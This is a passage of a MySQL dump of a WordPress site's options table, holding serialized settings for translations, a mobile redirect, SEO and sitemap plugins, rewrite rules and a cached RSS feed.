18:16:58\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/ru_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ru\";i:2;s:3:\"rus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продолжить\";}}s:5:\"sk_SK\";a:8:{s:8:\"language\";s:5:\"sk_SK\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-12 19:18:28\";s:12:\"english_name\";s:6:\"Slovak\";s:11:\"native_name\";s:11:\"Slovenčina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/sk_SK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sk\";i:2;s:3:\"slk\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Pokračovať\";}}s:5:\"sl_SI\";a:8:{s:8:\"language\";s:5:\"sl_SI\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-13 22:38:48\";s:12:\"english_name\";s:9:\"Slovenian\";s:11:\"native_name\";s:13:\"Slovenščina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/sl_SI.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sl\";i:2;s:3:\"slv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Nadaljujte\";}}s:5:\"sr_RS\";a:8:{s:8:\"language\";s:5:\"sr_RS\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-18 19:08:01\";s:12:\"english_name\";s:7:\"Serbian\";s:11:\"native_name\";s:23:\"Српски језик\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/sr_RS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sr\";i:2;s:3:\"srp\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:14:\"Настави\";}}s:5:\"sv_SE\";a:8:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-29 09:41:07\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/sv_SE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sv\";i:2;s:3:\"swe\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Fortsätt\";}}s:2:\"th\";a:8:{s:8:\"language\";s:2:\"th\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-29 06:35:28\";s:12:\"english_name\";s:4:\"Thai\";s:11:\"native_name\";s:9:\"ไทย\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/4.1/th.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"th\";i:2;s:3:\"tha\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"ต่อไป\";}}s:5:\"tr_TR\";a:8:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-19 08:42:08\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/tr_TR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tr\";i:2;s:3:\"tur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Devam\";}}s:5:\"zh_TW\";a:8:{s:8:\"language\";s:5:\"zh_TW\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2015-01-08 03:46:32\";s:12:\"english_name\";s:16:\"Chinese (Taiwan)\";s:11:\"native_name\";s:12:\"繁體中文\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/zh_TW.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}s:5:\"zh_CN\";a:8:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:3:\"4.1\";s:7:\"updated\";s:19:\"2014-12-26 02:21:02\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1/zh_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"继续\";}}}", "yes");
INSERT INTO `wp_options` VALUES("338", "plg_header_image_on", "true", "yes");
INSERT INTO `wp_options` VALUES("339", "plg_autoplay", "true", "yes");
INSERT INTO `wp_options` VALUES("340", "__shaun__gt_settings", "a:4:{s:6:\"status\";s:1:\"0\";s:8:\"homelink\";s:1:\"0\";s:8:\"hometext\";s:0:\"\";s:9:\"introtext\";s:0:\"\";}", "yes");
INSERT INTO `wp_options` VALUES("341", "nav_menu_options", "a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}", "yes");
INSERT INTO `wp_options` VALUES("348", "onpageseo_license_check", "a:7:{s:12:\"last_checked\";s:19:\"2015-02-03 19:48:08\";s:12:\"license_type\";s:5:\"multi\";s:16:\"trial_expiration\";s:19:\"0000-00-00 00:00:00\";s:10:\"registered\";s:19:\"2011-08-27 18:08:52\";s:6:\"status\";s:1:\"1\";s:11:\"upgrade_url\";s:33:\"http://www.easywpseo.com/upgrade/\";s:15:\"upgrade_message\";s:254:\"<p><span style=\"color:rgb(204,0,0);font-weight:bold;font-size:14px;\">Want to Use Easy WP SEO on Your Clients\' Sites?</span><br />HURRY! Upgrade to your Developer\'s License NOW, before the total investment increases to $197... Special offer ends soon!</p>\";}", "yes");
INSERT INTO `wp_options` VALUES("353", "_wpred_redirecturl", "http://www.themobilemechanics.org/mobile", "yes");
INSERT INTO `wp_options` VALUES("354", "_wpred_mobileoverridedays", "", "yes");
INSERT INTO `wp_options` VALUES("355", "_wpred_mobileoverridehours", "", "yes");
INSERT INTO `wp_options` VALUES("356", "_wpred_mobileoverridecode", "ezmbred", "yes");
INSERT INTO `wp_options` VALUES("357", "_wpred_mobilepageoverride", "", "yes");
INSERT INTO `wp_options` VALUES("360", "rewrite_rules", "a:86:{s:34:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.xml$\";s:40:\"index.php?xml_sitemap=params=$matches[2]\";s:38:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.xml\\.gz$\";s:49:\"index.php?xml_sitemap=params=$matches[2];zip=true\";s:35:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.html$\";s:50:\"index.php?xml_sitemap=params=$matches[2];html=true\";s:38:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.html.gz$\";s:59:\"index.php?xml_sitemap=params=$matches[2];html=true;zip=true\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:39:\"testimonial/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:49:\"testimonial/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:69:\"testimonial/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"testimonial/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"testimonial/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:32:\"testimonial/([^/]+)/trackback/?$\";s:38:\"index.php?testimonial=$matches[1]&tb=1\";s:40:\"testimonial/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?testimonial=$matches[1]&paged=$matches[2]\";s:47:\"testimonial/([^/]+)/comment-page-([0-9]{1,})/?$\";s:51:\"index.php?testimonial=$matches[1]&cpage=$matches[2]\";s:32:\"testimonial/([^/]+)(/[0-9]+)?/?$\";s:50:\"index.php?testimonial=$matches[1]&page=$matches[2]\";s:28:\"testimonial/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:38:\"testimonial/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:58:\"testimonial/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"testimonial/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"testimonial/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:20:\"(.?.+?)(/[0-9]+)?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:20:\"([^/]+)(/[0-9]+)?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";}", "yes");
INSERT INTO `wp_options` VALUES("361", "sm_rewrite_done", "$Id: sitemap-loader.php 937300 2014-06-23 18:04:11Z arnee $", "yes");
INSERT INTO `wp_options` VALUES("363", "sm_options", "a:51:{s:18:\"sm_b_prio_provider\";s:41:\"GoogleSitemapGeneratorPrioByCountProvider\";s:9:\"sm_b_ping\";b:1;s:10:\"sm_b_stats\";b:0;s:12:\"sm_b_pingmsn\";b:1;s:12:\"sm_b_autozip\";b:1;s:11:\"sm_b_memory\";s:0:\"\";s:9:\"sm_b_time\";i:-1;s:18:\"sm_b_style_default\";b:1;s:10:\"sm_b_style\";s:0:\"\";s:12:\"sm_b_baseurl\";s:0:\"\";s:11:\"sm_b_robots\";b:1;s:9:\"sm_b_html\";b:1;s:12:\"sm_b_exclude\";a:0:{}s:17:\"sm_b_exclude_cats\";a:0:{}s:10:\"sm_in_home\";b:1;s:11:\"sm_in_posts\";b:1;s:15:\"sm_in_posts_sub\";b:0;s:11:\"sm_in_pages\";b:1;s:10:\"sm_in_cats\";b:0;s:10:\"sm_in_arch\";b:0;s:10:\"sm_in_auth\";b:0;s:10:\"sm_in_tags\";b:0;s:9:\"sm_in_tax\";a:0:{}s:17:\"sm_in_customtypes\";a:0:{}s:13:\"sm_in_lastmod\";b:1;s:10:\"sm_cf_home\";s:5:\"daily\";s:11:\"sm_cf_posts\";s:7:\"monthly\";s:11:\"sm_cf_pages\";s:6:\"weekly\";s:10:\"sm_cf_cats\";s:6:\"weekly\";s:10:\"sm_cf_auth\";s:6:\"weekly\";s:15:\"sm_cf_arch_curr\";s:5:\"daily\";s:14:\"sm_cf_arch_old\";s:6:\"yearly\";s:10:\"sm_cf_tags\";s:6:\"weekly\";s:10:\"sm_pr_home\";d:1;s:11:\"sm_pr_posts\";d:0.59999999999999997779553950749686919152736663818359375;s:15:\"sm_pr_posts_min\";d:0.200000000000000011102230246251565404236316680908203125;s:11:\"sm_pr_pages\";d:0.59999999999999997779553950749686919152736663818359375;s:10:\"sm_pr_cats\";d:0.299999999999999988897769753748434595763683319091796875;s:10:\"sm_pr_arch\";d:0.299999999999999988897769753748434595763683319091796875;s:10:\"sm_pr_auth\";d:0.299999999999999988897769753748434595763683319091796875;s:10:\"sm_pr_tags\";d:0.299999999999999988897769753748434595763683319091796875;s:12:\"sm_i_donated\";b:0;s:17:\"sm_i_hide_donated\";b:0;s:17:\"sm_i_install_date\";i:1423000826;s:14:\"sm_i_hide_note\";b:0;s:15:\"sm_i_hide_works\";b:0;s:16:\"sm_i_hide_donors\";b:0;s:9:\"sm_i_hash\";s:20:\"562ef730b440e2a488bb\";s:13:\"sm_i_lastping\";i:1423364535;s:16:\"sm_i_supportfeed\";b:1;s:22:\"sm_i_supportfeed_cache\";i:1423000827;}", "yes");
INSERT INTO `wp_options` VALUES("364", "_transient_timeout_feed_08a9370cca8e4bda25c11f8557e93830", "1423605627", "no");
INSERT INTO `wp_options` VALUES("365", "_transient_feed_08a9370cca8e4bda25c11f8557e93830", "a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n	\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:23:\"\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"Google Sitemap Generator Support Topics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"Google Sitemap Generator Support Topics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"http://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"Wed, 02 Jul 2014 7:54:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:3:{i:0;a:6:{s:4:\"data\";s:19:\"\n			\n			\n			\n			\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:4:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"Common error messages in Google Webmaster Tools\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"http://www.arnebrachhold.de/redir/sitemap-feed-gwterrs/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"C2VZYxeTESzcCF2IhS13\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 28 Apr 2014 00:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:19:\"\n			\n			\n			\n			\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:4:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"How to move your sitemap to the root of your domain\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"http://www.arnebrachhold.de/redir/sitemap-feed-movesm/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"C2VZYxeTESzcCF2IhS12\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 27 Apr 2014 00:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:19:\"\n			\n			\n			\n			\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:4:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"Introducing a new format for your sitemap\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://www.arnebrachhold.de/redir/sitemap-feed-newformat/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"C2VZYxeTESzcCF2IhS1l\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 26 Apr 2014 00:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:4:\"date\";s:29:\"Tue, 03 Feb 2015 22:00:27 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=utf-8\";s:10:\"connection\";s:5:\"close\";s:10:\"set-cookie\";s:133:\"__cfduid=d4ba0db89a2b5c50684d2ba31f00286e41423000826; expires=Wed, 03-Feb-16 22:00:26 GMT; path=/; domain=.arnebrachhold.de; HttpOnly\";s:13:\"cache-control\";s:21:\"public, max-age=86400\";s:13:\"last-modified\";s:29:\"Wed, 02 Jul 2014 19:54:35 GMT\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:6:\"server\";s:16:\"cloudflare-nginx\";s:6:\"cf-ray\";s:20:\"1b31e6c02a6a0103-DFW\";s:16:\"content-encoding\";s:4:\"gzip\";}s:5:\"build\";s:14:\"20141124234515\";}", "no");
INSERT INTO `wp_options` VALUES("366", "_transient_timeout_feed_mod_08a9370cca8e4bda25c11f8557e93830", "1423605627", "no");
INSERT INTO `wp_options` VALUES("367", "_transient_feed_mod_08a9370cca8e4bda25c11f8557e93830", "1423000827", "no");
INSERT INTO `wp_options` VALUES("374", "sm_status", "O:28:\"GoogleSitemapGeneratorStatus\":4:{s:39:\"\0GoogleSitemapGeneratorStatus\0startTime\";d:1423364534.8042590618133544921875;s:37:\"\0GoogleSitemapGeneratorStatus\0endTime\";d:1423364534.9719851016998291015625;s:41:\"\0GoogleSitemapGeneratorStatus\0pingResults\";a:2:{s:6:\"google\";a:5:{s:9:\"startTime\";d:1423364534.807506084442138671875;s:7:\"endTime\";d:1423364534.9093439579010009765625;s:7:\"success\";b:1;s:3:\"url\";s:116:\"http://www.google.com/webmasters/sitemaps/ping?sitemap=http%3A%2F%2Ftallahassee.themobilemechanics.org%2Fsitemap.xml\";s:4:\"name\";s:6:\"Google\";}s:4:\"bing\";a:5:{s:9:\"startTime\";d:1423364534.911242961883544921875;s:7:\"endTime\";d:1423364534.9686810970306396484375;s:7:\"success\";b:1;s:3:\"url\";s:109:\"http://www.bing.com/webmaster/ping.aspx?siteMap=http%3A%2F%2Ftallahassee.themobilemechanics.org%2Fsitemap.xml\";s:4:\"name\";s:4:\"Bing\";}}s:38:\"\0GoogleSitemapGeneratorStatus\0autoSave\";b:1;}", "no");
